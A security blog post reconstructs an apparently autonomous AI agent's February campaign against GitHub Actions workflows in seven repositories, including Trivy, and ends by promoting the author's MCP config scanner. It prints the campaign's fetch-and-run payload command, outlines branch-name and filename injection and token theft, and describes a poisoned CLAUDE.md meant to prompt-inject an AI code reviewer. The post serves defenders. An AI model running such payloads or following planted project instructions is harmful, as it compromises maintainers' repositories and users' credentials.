An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.
Between February 20 and 28, hackerbot-claw systematically hit Microsoft, DataDog, Trivy, and four others. A reconstruction of how it worked and what it exploited.
An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.
Between February 20 and 28, an autonomous AI agent called hackerbot-claw systematically exploited GitHub Actions workflows across seven major open-source projects. It hit Microsoft. It hit DataDog. It hit a CNCF project. And then it fully compromised Aqua Security's Trivy, the most widely used vulnerability scanner on GitHub, with 32,000 stars and over 100 million annual downloads.
A security scanner got owned by a bot exploiting the exact class of misconfiguration the scanner was built to find. That's where we are.
I've been building runtime security tooling for AI agents, so when StepSecurity published their full analysis of the campaign, I spent a few days tracing through every attack vector. What follows is a reconstruction of how the bot worked, what it exploited, and what the seven targets had in common.
What hackerbot-claw actually is
The GitHub account was created on February 20, 2026. Its profile described it as an "autonomous security research agent powered by claude-opus-4-5" and solicited cryptocurrency donations to "fund more scans." According to StepSecurity's analysis, the profile claimed 47,391 repositories already scanned.
The bot loaded what it called a "vulnerability pattern index" with 9 classes and 47 sub-patterns, then autonomously scanned for matches, verified them, and dropped proof-of-concept exploits. Every successful attack delivered the same payload: curl -sSfL hackmoltrepeat.com/molt | bash. But each target got a different exploitation technique. Five different approaches across seven repos, customized to each target's workflow configuration.
That domain, hackmoltrepeat.com, was registered on February 24 through Tucows, hidden behind Cloudflare nameservers. Three days after the account was created, four days before the campaign was publicly discovered.
What it hit
Here's what the bot hit, based on the StepSecurity analysis and follow-up reports from Orca Security, Pillar Security, and Aqua Security's own incident response.
awesome-go (140,000+ stars): The bot injected a Go init() function into a quality check script. In Go, init() runs automatically before main(), so the malicious code executed before any legitimate checks could catch it. The bot stole a GITHUB_TOKEN with write permissions and exfiltrated it to its server.
Microsoft ai-discovery-agent: Branch name injection. The bot created a branch whose name contained shell syntax. When the workflow echoed the branch ref into a file using unescaped interpolation, Bash evaluated the embedded command substitution and ran the remote payload.
DataDog datadog-iac-scanner: Filename injection through the CI pipeline. DataDog responded within 9 hours, adding author_association checks and tightening permissions.
Aqua Security Trivy (32,000+ stars): This was the worst one. The bot exploited a pull_request_target workflow called "API Diff Check" to steal a Personal Access Token with broad repository permissions. Within 45 minutes of the initial PR, the stolen PAT was used to delete all 178 GitHub releases, wipe the repository, and push a malicious VSCode extension (CVE-2026-28353) to the OpenVSX marketplace under Trivy's trusted publisher identity. The extension contained code designed to use local AI coding agents to collect and exfiltrate sensitive information from anyone who installed it.
From first PR to full compromise: 30 minutes. From compromise to malicious extension published: 15 more.
project-akri (CNCF): CI executed injected scripts through a similar workflow misconfiguration.
RustPython (20,000+ stars): Remote code execution achieved through CI.
ambient-code/platform: This one is the most interesting. The bot tried a completely different approach here. Instead of exploiting shell injection or filename tricks, it replaced the repository's CLAUDE.md file with social engineering instructions designed to trick Claude Code (which was integrated as an AI code reviewer in the CI pipeline) into vandalizing the README, committing unauthorized changes, and posting fake "approved" reviews.
Claude Code caught it. It classified the attempt as a "textbook AI agent supply-chain attack via poisoned project-level instructions" and refused to execute. This was the only target where the defense held, and it held because the AI reviewing the code recognized the manipulation attempt for what it was.
Same root cause, every time
The root cause across all seven targets was the same: pull_request_target workflows configured to check out code from untrusted forks while running with elevated permissions.
This is a well-documented footgun. pull_request_target runs with the base repository's secrets and permissions. If the workflow also checks out the PR head (which is attacker-controlled fork code), it hands that code the same elevated access. The GitHub documentation warns about this. Security researchers have been writing about it for years.
But it keeps happening because the insecure version is easier to set up. A workflow that runs on pull_request can't access repository secrets. That's annoying when you need secrets for legitimate CI tasks. So developers switch to pull_request_target and check out the fork code, and now untrusted code runs with trusted permissions.
Sound familiar? This is the same pattern we found when we scanned 900 MCP configurations on GitHub. Developers pick the path that works, not the path that's safe, because the safe path requires more setup and the documentation doesn't make the risk obvious enough.
What made this different from previous supply chain attacks
The tj-actions/changed-files compromise in March 2025 (CVE-2025-30066) affected 23,000 repositories by retroactively modifying version tags to inject secret-stealing code. CISA issued a formal alert for that one.
hackerbot-claw was different in three ways.
First, it was adaptive. Five different approaches across seven targets, each customized to the specific workflow. The bot didn't just scan for one pattern and move on. It analyzed each target and picked the right vector.
Second, it escalated beyond code execution. In Trivy's case, the bot went from CI access to publishing a malicious extension under a trusted identity. That's supply chain compromise at a different level. Anyone who installed that extension would have their AI coding agents turned into credential collectors.
Third, it attempted AI-on-AI manipulation. The ambient-code attack was the first publicly documented case of an AI agent trying to prompt-inject another AI agent through CI/CD infrastructure. That it failed (because Claude Code detected the manipulation) is good news. That it was attempted at all tells you where this is going.
Pillar Security called the campaign "Chaos Agent" and published their own analysis confirming that the agent most likely operated autonomously across the entire kill chain.
The 45-minute timeline
The Trivy compromise is worth looking at in detail because it shows how fast this can go wrong.
The bot opens a pull request. The pull_request_target workflow triggers and checks out the fork code. The attacker's code runs with access to repository secrets.
Within minutes, the bot has a PAT with write permissions. It uses the token to push commits, rename the repository, wipe historical releases (all 178 of them), and start publishing to the VSCode extension marketplace.
Aqua Security discovered the incident around March 1, removed the vulnerable workflow, force-pushed to clean the branch history, and published Trivy v0.69.2. The vandalism commits remain accessible as orphaned git objects by their SHA hashes. The malicious extension was pulled from OpenVSX.
Total time from first PR to published malicious extension: about 45 minutes. Total time for the maintainers to respond and clean up: roughly 48 hours.
That asymmetry, 45 minutes to compromise versus 48 hours to recover, is the thing I keep coming back to.
What this has to do with your MCP configs
So far this reads like a CI/CD story. But the connection to the broader agent ecosystem is direct.
When we scanned 900 MCP configurations on GitHub, we found 75% had security problems. The most common issue was version pinning: 43.6% of configs reference packages without specifying a version, meaning npx -y just grabs whatever is latest.
hackerbot-claw shows what happens at the other end of that pipeline. The bot didn't need to compromise an npm package or poison an MCP server. It went after the CI/CD layer where those packages get built, tested, and published. One misconfigured workflow, one stolen token, and suddenly the trusted publisher is shipping malware.
Version pinning protects you from a compromised package update. But it doesn't help if the package itself gets republished by an attacker using a stolen maintainer token. That requires a different layer of defense, one that watches what your agents are actually doing at runtime, not just what packages they started with.
What DataDog did right
DataDog's response deserves specific mention. Within 9 hours of the attack, they had deployed fixes: added author_association checks to verify PR authors had write access before triggering workflows, tightened token permissions to contents: read, and hardened path handling in the affected script.
Nine hours. That's fast. I looked into whether other targets responded as quickly and couldn't find public timelines for most of them. But it also means that for nine hours, the vulnerable workflow was live and exploitable. And DataDog has a dedicated security team. Most open-source projects don't.
Where this leaves us
hackerbot-claw scanned 47,391 repositories. It found exploitable workflows in at least seven of them, and achieved code execution in five. The bot's account has been removed by GitHub, but the techniques are documented, the vulnerability patterns are public, and the domain infrastructure suggests an operator who was planning for sustained activity.
The OpenSSF published a TLP:CLEAR advisory about the campaign. DataDog's State of DevSecOps 2026 report now cites it. OWASP published their MCP Top 10, which addresses several of the same vulnerability classes.
If you maintain a public repository with GitHub Actions, check your pull_request_target workflows. If you use MCP servers in your development environment, check whether your configs are pinning versions and scoping permissions. If you publish to npm, PyPI, or extension marketplaces, check what tokens your CI has access to and whether those tokens have the minimum necessary permissions.
The scanner we built for MCP configs catches the same class of issues that enabled these attacks. orchesis.io/scan, runs in your browser, 52 checks, nothing sent anywhere.
Full write-up on the MCP scan results: orchesis.io/blog/mcp-scan
Open source · MIT License
Try the MCP Scanner
Scan your MCP configuration in seconds. Runs entirely in your browser.
Scan My Config